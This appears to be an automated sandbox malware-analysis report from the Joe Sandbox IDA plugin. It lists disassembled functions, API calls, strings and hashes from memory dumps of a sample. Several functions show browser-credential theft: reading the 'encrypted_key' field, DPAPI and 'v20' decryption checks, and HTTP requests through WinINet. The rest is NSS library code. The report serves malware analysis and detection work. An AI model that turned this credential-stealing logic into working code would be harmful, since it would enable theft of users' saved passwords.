free.MOZGLUE(?,?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000,?,6CFD80C1), ref: 6CFD5D85
free.MOZGLUE(?,?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000,?,6CFD80C1), ref: 6CFD5D99
free.MOZGLUE(?,?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000,?,6CFD80C1), ref: 6CFD5DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000,?,6CFD80C1), ref: 6CFD5E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CFD5E3E
free.MOZGLUE(?,?,?,?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CFD5E47
free.MOZGLUE(?,?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000,?,6CFD80C1), ref: 6CFD5E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CFD5E78
free.MOZGLUE(?,?,?,?,?,?,?,6CFDAAD4), ref: 6CFD5EB9
free.MOZGLUE(?,?,?,?,?,?,?,6CFDAAD4), ref: 6CFD5EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CFDAAD4), ref: 6CFD5F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CFDAAD4), ref: 6CFD5F4B

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 241be331ecddb35384ff42ae25c2550dd9a6cebfae4f91fc83d6f42326a49a00
Instruction ID: cf372cfbeece84c56df6a79c1a30fc34841928d42058bbebff69d87fba1bacd6
Opcode Fuzzy Hash: 241be331ecddb35384ff42ae25c2550dd9a6cebfae4f91fc83d6f42326a49a00
Instruction Fuzzy Hash: AE718FB5A04B019FD700CF24D884A92B7F5FF89308F198529E85E87B11EB31F965CB95

Function 6CF58DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CF58E22
EnterCriticalSection.KERNEL32(?), ref: 6CF58E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CF58E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CF58E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CF58E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF58EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CF58EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CF58EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CF58F00
free.MOZGLUE(?), ref: 6CF58F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CF58F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CF58F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CF58F5B
PR_Unlock.NSS3(?), ref: 6CF58F72
PR_Unlock.NSS3(?), ref: 6CF58F82

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: af1173aa9d7ef09bf7a3ec805eabe1e606bff39ed2f9b8436502f478c5f3be33
Instruction ID: 84906fdb8cfe4ae75337b91643d2e5376eb429a543d19809141bb415f1f236a4
Opcode Fuzzy Hash: af1173aa9d7ef09bf7a3ec805eabe1e606bff39ed2f9b8436502f478c5f3be33
Instruction Fuzzy Hash: B95103B2E40205AFE7008F68CC84AAFB7B9EF65358F55412AED089B700E731ED6187D1

Function 6CECDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6CECDD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CECDD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CECDE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CECDEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CECDECD

Strings

%s at line %d of [%.10s], xrefs: 6CECDF7C, 6CECDFEC
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CECDF6D, 6CECDFCC, 6CECDFDD
database corruption, xrefs: 6CECDF77, 6CECDFE7

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 7dba1082e4c1ae41d9f41f8afde3f8a89c413d07e9a70398809148d9f3495f18
Instruction ID: 14cfab6f959d0a78c73fd856e19f66f2b022b30c559f6769c78edd5e217653e1
Opcode Fuzzy Hash: 7dba1082e4c1ae41d9f41f8afde3f8a89c413d07e9a70398809148d9f3495f18
Instruction Fuzzy Hash: 1CA11574B443419FD310CF18C581B6ABBF5BF85308F25892CE8A98BB41D332E956CB92

Function 6CF8EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CF8EE0B

Part of subcall function 6CFA0BE0: malloc.MOZGLUE(6CF98D2D,?,00000000,?), ref: 6CFA0BF8
Part of subcall function 6CFA0BE0: TlsGetValue.KERNEL32(6CF98D2D,?,00000000,?), ref: 6CFA0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF8EEE1

Part of subcall function 6CF81D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CF81D7E
Part of subcall function 6CF81D50: EnterCriticalSection.KERNEL32(?), ref: 6CF81D8E
Part of subcall function 6CF81D50: PR_Unlock.NSS3(?), ref: 6CF81DD3

TlsGetValue.KERNEL32 ref: 6CF8EE51
EnterCriticalSection.KERNEL32(?), ref: 6CF8EE65
PR_Unlock.NSS3(?), ref: 6CF8EEA2
free.MOZGLUE(?), ref: 6CF8EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CF8EED0
PR_Unlock.NSS3(?), ref: 6CF8EF48
free.MOZGLUE(?), ref: 6CF8EF68
PR_SetError.NSS3(00000000,00000000), ref: 6CF8EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CF8EFA4
free.MOZGLUE(?), ref: 6CF8EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CF8F055
free.MOZGLUE(?), ref: 6CF8F060

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 5f6d8545b3308e53701a32a4ecd287ab315a8c6a8f82af11522b89dcace9a366
Instruction ID: c09e9fb44caf7931c95b0c6bd22b16e614f46800b109f89d8fcb1732f8230d88
Opcode Fuzzy Hash: 5f6d8545b3308e53701a32a4ecd287ab315a8c6a8f82af11522b89dcace9a366
Instruction Fuzzy Hash: A3816DB5A01209AFEF00DFA5DC85BDE7BB5BF48318F154024E919A7711E731E924CBA1

Function 6CF54CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CF54D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CF54D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CF54DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF54E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CF54E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CF54E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CF54E85
DER_Encode_Util.NSS3(?,?,6D0A05A4,00000000), ref: 6CF54EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CF54F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CF54F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF54F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CF54F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CF54F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF54FC8

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 4afbe4aa4535eb67dd012156372bb8d314728b6001decda319cc187195854c4b
Instruction ID: 0aafa8b63621766850b4f00875f9f9526de8dbe68aa1ba3efba8eeae799ba0cf
Opcode Fuzzy Hash: 4afbe4aa4535eb67dd012156372bb8d314728b6001decda319cc187195854c4b
Instruction Fuzzy Hash: 5581C572908301AFE701CF28D840B9BBBE4AF95348F54852DFA59DB641E731E925CB92

Function 6CF95C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CF95C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CF95CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CF95CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CF95D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CF95D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF95D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CF95E18
TlsGetValue.KERNEL32 ref: 6CF95E5E
EnterCriticalSection.KERNEL32(?), ref: 6CF95E72
PR_Unlock.NSS3(?), ref: 6CF95E8B

Part of subcall function 6CF8F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CF8F854
Part of subcall function 6CF8F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CF8F868
Part of subcall function 6CF8F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CF8F882
Part of subcall function 6CF8F820: free.MOZGLUE(04C483FF,?,?), ref: 6CF8F889
Part of subcall function 6CF8F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CF8F8A4
Part of subcall function 6CF8F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CF8F8AB
Part of subcall function 6CF8F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CF8F8C9
Part of subcall function 6CF8F820: free.MOZGLUE(280F10EC,?,?), ref: 6CF8F8D0

Strings

d, xrefs: 6CF95C36
tokens=[0x%x=<%s>], xrefs: 6CF95D3D

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 9bc87662b44a1e9f56991cab29cce16583fd11b1468152ea0ae7603556746d5a
Instruction ID: 00e1d5b01c76ba5fd47366f3286cf9724e902f39e8d2316a93f856c3af3887ac
Opcode Fuzzy Hash: 9bc87662b44a1e9f56991cab29cce16583fd11b1468152ea0ae7603556746d5a
Instruction Fuzzy Hash: 5771D4B1E051059BFF01AF35DC417AE3679AF4530EF180235EC099AB52EB32E919C792

Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02D27178), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02D26910,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
lstrlenA.KERNEL32(00000000), ref: 0041557F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
lstrlenA.KERNEL32(00000000), ref: 004155D3
strtok.MSVCRT(00000000,?), ref: 004155EE
lstrlenA.KERNEL32(00000000), ref: 004155FE

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

ERROR, xrefs: 00415609
lXA, xrefs: 0041570E, 004156D4, 00415697, 0041565A, 0041561E
ERROR, xrefs: 004156F9
ERROR, xrefs: 0041555A
ERROR, xrefs: 00415682
ERROR, xrefs: 004156BF

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
API String ID: 3532888709-2643084821
Opcode ID: c37eaed066fb4945219c9783893884aafbae9d79186d04e87be5e54c426c7b01
Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
Opcode Fuzzy Hash: c37eaed066fb4945219c9783893884aafbae9d79186d04e87be5e54c426c7b01
Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A

Function 6CF86C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CF8781D,00000000,6CF7BE2C,?,6CF86B1D,?,?,?,?,00000000,00000000,6CF8781D), ref: 6CF86C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CF8781D,?,6CF7BE2C,?), ref: 6CF86C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CF8781D), ref: 6CF86C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CF86C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CF86C96

Part of subcall function 6CF31240: TlsGetValue.KERNEL32(00000040,?,6CF3116C,NSPR_LOG_MODULES), ref: 6CF31267
Part of subcall function 6CF31240: EnterCriticalSection.KERNEL32(?,?,?,6CF3116C,NSPR_LOG_MODULES), ref: 6CF3127C
Part of subcall function 6CF31240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CF3116C,NSPR_LOG_MODULES), ref: 6CF31291
Part of subcall function 6CF31240: PR_Unlock.NSS3(?,?,?,?,6CF3116C,NSPR_LOG_MODULES), ref: 6CF312A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CF86CAA

Strings

rdb:, xrefs: 6CF86C69
dbm, xrefs: 6CF86CA4
sql:, xrefs: 6CF86C52
dbm:, xrefs: 6CF86C3A
extern:, xrefs: 6CF86C7E
NSS_DEFAULT_DB_TYPE, xrefs: 6CF86C91

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 0b7c13d4198b91eec333ab8425c972af3d2b4d50c8b3c4e7b6f0a87c0a917b9d
Instruction ID: 9cf7305d02402248bbb873e3a8c131ed2dbf7765bfa2f5e2f71fc457e3292649
Opcode Fuzzy Hash: 0b7c13d4198b91eec333ab8425c972af3d2b4d50c8b3c4e7b6f0a87c0a917b9d
Instruction Fuzzy Hash: CA01A2E1F0332137FA101B7A5D4AF26356DAF8615AF040031FF09E5583EFA6E91480AD

Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004144EE
memset.MSVCRT ref: 00414505

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 0041453C
lstrcatA.KERNEL32(?,02D25850), ref: 0041455B
lstrcatA.KERNEL32(?,?), ref: 0041456F
lstrcatA.KERNEL32(?,02D25460), ref: 00414583

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563

StrStrA.SHLWAPI(?,02D258E0), ref: 00414643
GlobalFree.KERNEL32(?), ref: 00414762

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrcatA.KERNEL32(?,00000000), ref: 004146F3
StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
lstrcatA.KERNEL32(00000000,?), ref: 00414735
lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: f642854c61d756b8c559f92b2fcc8e29c1366d9ebde658316f4cfb05bafdb15e
Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
Opcode Fuzzy Hash: f642854c61d756b8c559f92b2fcc8e29c1366d9ebde658316f4cfb05bafdb15e
Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55

Function 6CF3ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF3ACE2
malloc.MOZGLUE(00000001), ref: 6CF3ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CF3AD02
TlsGetValue.KERNEL32 ref: 6CF3AD3C
calloc.MOZGLUE(00000001,?), ref: 6CF3AD8C
PR_Unlock.NSS3 ref: 6CF3ADC0
free.MOZGLUE(00000000), ref: 6CF3AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF3AE58
free.MOZGLUE(00000000), ref: 6CF3AE69
free.MOZGLUE(?), ref: 6CF3AE78
PR_Unlock.NSS3 ref: 6CF3AE8C
free.MOZGLUE(?), ref: 6CF3AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF3AEC7

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

